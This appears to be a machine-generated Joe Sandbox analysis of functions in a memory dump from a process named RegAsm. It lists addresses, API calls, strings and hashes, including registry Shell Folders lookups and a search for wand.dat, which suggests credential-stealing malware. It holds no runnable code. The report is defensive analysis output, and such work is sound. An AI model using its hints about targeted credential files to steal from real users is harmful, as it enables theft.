Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A

Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410055
memset.MSVCRT ref: 0041006A
_snwprintf.MSVCRT ref: 004100B7

Strings

<?xml version="1.0" ?>, xrefs: 0041007C
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
<%s>, xrefs: 004100A6

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99

Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A198
_snwprintf.MSVCRT ref: 0040A1BF
wcscat.MSVCRT ref: 0040A1D1
wcscat.MSVCRT ref: 0040A1EE
wcscat.MSVCRT ref: 0040A1FD

Strings

%2.2X, xrefs: 0040A1AE

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A

Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040D5FB
wcscpy.MSVCRT ref: 0040D61E

Strings

strings, xrefs: 0040D609
general, xrefs: 0040D614
menu_%d, xrefs: 0040D5DF
dialog_%d, xrefs: 0040D5EF

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F

Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6

Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5

Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD

memset.MSVCRT ref: 0040C439
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
_wcsupr.MSVCRT ref: 0040C481

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F

memset.MSVCRT ref: 0040C4D0
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
String ID:
API String ID: 1973883786-0
Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5

Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004116FF

Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C

Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1

Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3

Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF

Strings

txt, xrefs: 00411704
*.txt, xrefs: 00411721
*.csv, xrefs: 00411750
*.xml, xrefs: 0041178C
*.htm;*.html, xrefs: 00411765

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 2618321458-3614832568
Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99

Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004185FC
GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
??3@YAXPAX@Z.MSVCRT ref: 00418650

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@AttributesFilememset
String ID:
API String ID: 776155459-0
Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE

Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 004174FC
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
malloc.MSVCRT ref: 00417524
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
??3@YAXPAX@Z.MSVCRT ref: 00417544
??3@YAXPAX@Z.MSVCRT ref: 00417562

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@ByteCharMultiWide$ApisFilemalloc
String ID:
API String ID: 2308052813-0
Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD

Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
??3@YAXPAX@Z.MSVCRT ref: 0041822B

Strings

%s\etilqs_, xrefs: 00418282
etilqs_, xrefs: 00418233

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: PathTemp$??3@
String ID: %s\etilqs_$etilqs_
API String ID: 1589464350-1420421710
Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D

Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00409750
_snwprintf.MSVCRT ref: 0040977D
MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796

Strings

Error %d: %s, xrefs: 0040976C
Error, xrefs: 00409787

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59

Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00431771
memcpy.MSVCRT ref: 00431888

Strings

unknown column "%s" in foreign key definition, xrefs: 00431858
foreign key on %s should reference only one column of table %T, xrefs: 004316CD
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99

Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0044A6EB
memset.MSVCRT ref: 0044A6FB
memcpy.MSVCRT ref: 0044A75D
memcpy.MSVCRT ref: 0044A7AA

Strings

gj, xrefs: 0044A700

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpymemset
String ID: gj
API String ID: 1297977491-4203073231
Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756

Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00417497
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
malloc.MSVCRT ref: 004174BD
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
??3@YAXPAX@Z.MSVCRT ref: 004174E4

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$??3@ApisFilemalloc
String ID:
API String ID: 2903831945-0
Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9

Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0040D453
GetWindowRect.USER32(?,?), ref: 0040D460
GetClientRect.USER32(00000000,?), ref: 0040D46B
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5

Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
??2@YAPAXI@Z.MSVCRT ref: 004450BE
memset.MSVCRT ref: 004450CD

Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306

??3@YAXPAX@Z.MSVCRT ref: 004450F0

Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D

CloseHandle.KERNEL32(00000000), ref: 004450F7

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
String ID:
API String ID: 1471605966-0
Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD

Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 0044475F
wcscat.MSVCRT ref: 0044476E
wcscat.MSVCRT ref: 0044477F
wcscat.MSVCRT ref: 0044478E

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3

Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC

Strings

\StringFileInfo\, xrefs: 00444759

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 102104167-2245444037
Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69

Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040F561
memcpy.MSVCRT ref: 0040F573
memcpy.MSVCRT ref: 0040F5A6

Strings

g4@, xrefs: 0040F583, 0040F520

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy$??3@
String ID: g4@
API String ID: 3314356048-2133833424
Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04

Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004100FB
memset.MSVCRT ref: 00410112

Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE

_snwprintf.MSVCRT ref: 00410141

Strings

</%s>, xrefs: 00410130

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99

Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D58D
SetWindowTextW.USER32(?,?), ref: 0040D5BD
EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD

Strings

caption, xrefs: 0040D5A2

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D

Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47

CreateFontIndirectW.GDI32(?), ref: 00401156
SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193

Strings

MS Sans Serif, xrefs: 00401142

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
String ID: MS Sans Serif
API String ID: 210187428-168460110
Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658

Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040560C

Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C

Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1

Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3

Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269

Strings

wand.dat, xrefs: 00405632
dat, xrefs: 00405611
*.*, xrefs: 0040564D

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
String ID: *.*$dat$wand.dat
API String ID: 2618321458-1828844352
Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89

Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412057

Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
GetKeyState.USER32(00000010), ref: 0041210D

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID:
API String ID: 3550944819-0
Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14

Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040B1DE
??3@YAXPAX@Z.MSVCRT ref: 0040B201

Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31

??3@YAXPAX@Z.MSVCRT ref: 0040B224
memcpy.MSVCRT ref: 0040B248

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@$memcpy$mallocwcslen
String ID:
API String ID: 3023356884-0
Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98

Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040B0D8
??3@YAXPAX@Z.MSVCRT ref: 0040B0FB

